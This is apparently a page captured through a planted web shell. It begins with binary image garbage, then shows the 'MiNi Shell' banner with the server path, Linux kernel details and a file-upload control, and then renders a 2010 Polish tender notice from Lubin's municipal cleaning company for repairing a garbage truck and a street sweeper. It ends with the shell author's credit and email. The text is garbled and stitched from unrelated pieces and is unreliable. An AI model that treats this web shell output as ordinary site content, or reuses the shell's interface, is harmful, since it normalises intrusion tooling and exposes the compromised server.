JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/136709-N-2010.html

<p class="kh_header"><b>Lubin: REMONT SAMOCHODÓW SPECJALISTYCZNYCH Z PODZIAŁEM NA ZADANIA: 
Zadanie nr 1: Remont śmieciarki SCANIA 6X2, VIN YSPX20001280243, nr rej. DLU R928, rok produkcji 2002, Zadanie nr 2: REMONT zamiatarki MERCEDES-BENZ 917KD,VIN WDB6760902K209070, nr rej. LIE 304, rok produkcji 1996</b><br>
<b>Numer ogłoszenia: 136709 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT SAMOCHODÓW SPECJALISTYCZNYCH Z PODZIAŁEM NA ZADANIA: 
Zadanie nr 1: Remont śmieciarki SCANIA 6X2, VIN YSPX20001280243, nr rej. DLU R928, rok produkcji 2002, Zadanie nr 2: REMONT zamiatarki MERCEDES-BENZ 917KD,VIN WDB6760902K209070, nr rej. LIE 304, rok produkcji 1996.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Określenie przedmiotu zamówienia za pomocą nazw i kodów ze Wspólnego Słownika Zamówień CPV: 

Kod	Nazwa 
50112000-3	Usługi w zakresie napraw i konserwacji samochodów
50110000-9	Usługi w zakresie napraw i konserwacji pojazdów silnikowych 
i podobnego sprzętu oraz usługi podobne
50116100-2	Usługi w zakresie naprawi układu elektrycznego
Przedmiotem zamówienia jest usługa - remont samochodów specjalistycznych z podziałem na zadania:
a)	ZADANIE nr 1 - Remont Śmieciarki SCANIA 6X2, VIN YS2PX20001280243, nr rej. DLU R928, rok produkcji 2002.
W ramach realizacji zamówienia pojazd musi mieć wykonane następujące czynności:
Skrzynia zbiorcza
Wymiana następujących  elementów:
-  blach bocznych skrzyni zbiorczej- ostatniego pola
-  szyn prowadzących ścianę wypychającą
-  podłogi skrzyni zbiorczej
-  klocków ślizgowych ściany wypychającej
-  listwy uszczelniającej ścian wypychającej 
-  amortyzatorów zamocowania skrzyni do podwozia
Część załadunkowa
Wymiana następujących elementów:
-  suwaka- zgarniaka, wymiana sworzni i tulei
-  sworzni i łożysk w siłownikach zgarniaka i suwaka
-  klocków ślizgowych suwaka 
-  prowadnic górnych szyn prasy
-  uszczelnień siłownika teleskopowego
-  sworzni dolnych zawieszenia odwłoka z uchwytem mocującym
-  uszczelnień odwłoka 
-  korpusu prasy wanny odwłoka , materiał trudnościeralny
-  dźwigni sterowania ręcznego prasą
-  dźwigni sterowania otwieraczem pokryw pojemników
-  zamków osłon bocznych
-  zaworu sterującego prasą
- uszczelnień siłowników zgarniaka
Urządzenie myjące LCV-2
Naprawa następujących elementów:
- układu sterującego urządzeniem myjącym LCV -2
Montaż następujących elementów:
- pneumatycznej pompy brudnej wody
Wrzutnik odpadów
Wymiana następujących elementów:
- sworzni, łożysk, tulei przy elementach ruchomych
Oraz musi mieć wykonane dodatkowe czynności:
Odrdzewienie mechaniczne, nałożenie powłoki ochronnej i lakierniczej na bocznych ścianach skrzyni zbiorczej, odwłoku i osłonach bocznych 
Uszczelnienie wycieków z instalacji hydraulicznej 
Naprawa połączeń instalacji elektrycznej

b)	ZADANIE nr 2- Remont Zamiatarki MERCEDES - BENZ 917KD, VIN WDB6760902K209070, nr rej. LIE 3048, rok produkcji 1996

W ramach realizacji zamówienia pojazd musi mieć wykonane następujące czynności:
Wymiana następujących elementów:
- wszystkich wkładów w filtrze głównym nadwozia zamiatarki
- siedziska i oparcia w fotelu kierowcy
- silnika i wentylatora chłodnicy oleju nadwozia roboczego
- czujnika temperatury oleju przy filtrze głównym
- joysticka sterowania hydrauliką z kabiny kierowcy 
- reduktora ciśnienia sterowania trzepaków
Naprawa następujących elementów:
- rozdzielaczy podnoszenia skrzyni ładunkowej i zamykania tylnej klapy
- zespołu elektrozaworów sterowania pracą nadwozia i trzepaków
- pompy wtryskowej silnika pojazdu
- resoru tylnego prawego zamiatarki

Wymagania dodatkowe jednakowe dla obu zadań
1.	Przedmiot zamówienia dostarczony będzie do remontu oraz odebrany z remontu przez Zamawiającego.
2.	Przedmiot zamówienia zostanie wykonany z materiałów, części Wykonawcy oraz przy użyciu jego maszyn i urządzeń.
3.	Koszty związane z zakupem części zamiennych, materiałów konstrukcyjnych, lakierniczych i innych ponosi Wykonawca.
4.	Zamawiający wymaga stosowania części zamiennych, materiałów eksploatacyjnych i innych spełniających normy zalecane przez producenta.
5.	Części zamienne , materiały konstrukcyjne, lakiernicze  i innych użyte przez Wykonawcę muszą być fabrycznie nowe, nie noszące śladów uszkodzeń.
6.	Płatność nastąpi w terminie 30 dni od dnia dostarczenia Zamawiającemu prawidłowo wystawionej faktury VAT.
7.	Podstawą wystawienia przez Wykonawcę faktury VAT jest podpisanie przez strony protokołu  odbioru potwierdzającego zgodność realizacji usługi z warunkami określonymi w SIWZ.
8.	Zamawiający  zastrzega sobie prawo do kontroli  warunków wykonywania remontu oraz odbioru usługi u Wykonawcy przez swoich upoważnionych przedstawicieli.
9.	Wyremontowane zespoły muszą być poddane próbom technicznym, polegających 
w szczególności na: sprawdzeniu działania mechanizmów, zgodnie z ich przeznaczeniem 
i parametrami przewidzianymi przez producenta podzespołu lub układu. 
10.	Na przedmiot zamówienia Wykonawca udziela minimum 12 miesięcy okresu gwarancji 
licząc od daty podpisania protokołu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.00.00-9, 50.11.61.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w Rozdziele X w pkt 1a)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w Rozdziele X w pkt 1a)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w Rozdziele X w pkt 1a)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w Rozdziele X w pkt 1a)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w Rozdziele X w pkt 1a)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wzór zobowiązania stanowi załącznik nr 5 do SIWZ. 
4.Pozostałe dokumenty bezwzględnie wymagane w ofercie
1)Wypełniony Formularz ofertowy zgodnie z załącznikiem nr 1 do SIWZ
2)PEŁNOMOCNICTWO 
a)Zamawiający żąda, aby Wykonawca do oferty (tylko w przypadku jeżeli z dokumentów dołączonych  do oferty nie wynika uprawnienie do podpisania oferty) dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualne zaświadczenie  o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr itp. Wymagane dokumenty należy złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
b)Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika 
z załączonych dokumentów, do oferty należy dołączyć także pełnomocnictwo 
w oryginale lub w postaci kopii poświadczonej za zgodność z oryginałem przez notariusza.
c)W oparciu o art. 26 ust 3 i 4 ustawy pzp, w zakresie odnoszącym się do pełnomocnictw, będziemy występować do Wykonawców będących osobami fizycznymi o uzupełnienie lub wyjaśnienie upoważnienia do podpisania oferty. Dla Wykonawców będących osobami fizycznymi wskazanie zaświadczenie o którym mowa w pkt 4 2a) rozdziału X SIWZ będzie właśnie dokumentem potwierdzającym prawo do złożenia podpisu.
d)Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu - tyko w przypadku złożenia ofert wspólnej.
Zgodnie z art. 23 ust.1 Prawa zamówień publicznych Wykonawcy mogą wspólnie  ubiegać się o udzielenie zamówienia składając następujące dokumenty:
a)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielne dokumenty wymienione w pkt 2a),2b), 2c),2d) rozdziału X SIWZ
b)	Oświadczenie o ustanowieniu pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
c)	Dokumenty, o których mowa w pkt 1 a) i pozostałe rozdziału X SIWZ - winni złożyć wspólnie. 
7.W przypadku składania oferty przez spółkę cywilną, należy:
a)dokumenty o których mowa w pkt  2 a), 2 b), 2 c), 2 d). rozdziału X SIWZ należy złożyć oddzielnie dla każdego ze wspólników tej Spółki. 
b)dokumenty, o których mowa w pkt 2c) i 2d)  rozdziału X SIWZ dla spółki i  pozostałe składane są wspólnie.
c)Przedsiębiorcy występujący jako Spółka Cywilna zobowiązani są do złączenia do oferty umowy Spółki celem ustalenia osób uprawnionych do reprezentowania Spółki;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana terminu wykonania usługi z przyczyn niezależnych od Wykonawcy, za zgodą obu stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością, ul. Rzeźnicza 1, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 09:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania Spółka z o.o., ul.Rzeźnicza 1, 59-300 Lubin w sekretariacie, pokój 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Remont śmieciarki SCANIA 6X2, VIN YS2PX20001280243, nr rej DLU R928, rok produkcji 2002.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji zamówienia pojazd musi mieć wykonane następujące czynności:
Skrzynia zbiorcza
Wymiana następujących  elementów:
-  blach bocznych skrzyni zbiorczej- ostatniego pola
-  szyn prowadzących ścianę wypychającą
-  podłogi skrzyni zbiorczej
-  klocków ślizgowych ściany wypychającej
-  listwy uszczelniającej ścian wypychającej 
-  amortyzatorów zamocowania skrzyni do podwozia
Część załadunkowa
Wymiana następujących elementów:
-  suwaka- zgarniaka, wymiana sworzni i tulei
-  sworzni i łożysk w siłownikach zgarniaka i suwaka
-  klocków ślizgowych suwaka 
-  prowadnic górnych szyn prasy
-  uszczelnień siłownika teleskopowego
-  sworzni dolnych zawieszenia odwłoka z uchwytem mocującym
-  uszczelnień odwłoka 
-  korpusu prasy wanny odwłoka , materiał trudnościeralny
-  dźwigni sterowania ręcznego prasą
-  dźwigni sterowania otwieraczem pokryw pojemników
-  zamków osłon bocznych
-  zaworu sterującego prasą
- uszczelnień siłowników zgarniaka
Urządzenie myjące LCV-2
Naprawa następujących elementów:
- układu sterującego urządzeniem myjącym LCV -2
Montaż następujących elementów:
- pneumatycznej pompy brudnej wody
Wrzutnik odpadów
Wymiana następujących elementów:
- sworzni, łożysk, tulei przy elementach ruchomych
Oraz musi mieć wykonane dodatkowe czynności:
Odrdzewienie mechaniczne, nałożenie powłoki ochronnej i lakierniczej na bocznych ścianach skrzyni zbiorczej, odwłoku i osłonach bocznych 
Uszczelnienie wycieków z instalacji hydraulicznej 
Naprawa połączeń instalacji elektrycznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.00.00-9, 50.11.61.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Remont zamiatarki Mercedes - Benz 917KD, VIN WDB6760902K209070, nr rej. LIE 3048, rok produkcji 1996.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji zamówienia pojazd musi mieć wykonane następujące czynności:
Wymiana następujących elementów:
- wszystkich wkładów w filtrze głównym nadwozia zamiatarki
- siedziska i oparcia w fotelu kierowcy
- silnika i wentylatora chłodnicy oleju nadwozia roboczego
- czujnika temperatury oleju przy filtrze głównym
- joysticka sterowania hydrauliką z kabiny kierowcy 
- reduktora ciśnienia sterowania trzepaków
Naprawa następujących elementów:
- rozdzielaczy podnoszenia skrzyni ładunkowej i zamykania tylnej klapy
- zespołu elektrozaworów sterowania pracą nadwozia i trzepaków
- pompy wtryskowej silnika pojazdu
- resoru tylnego prawego zamiatarki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.00.00-9, 50.11.61.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com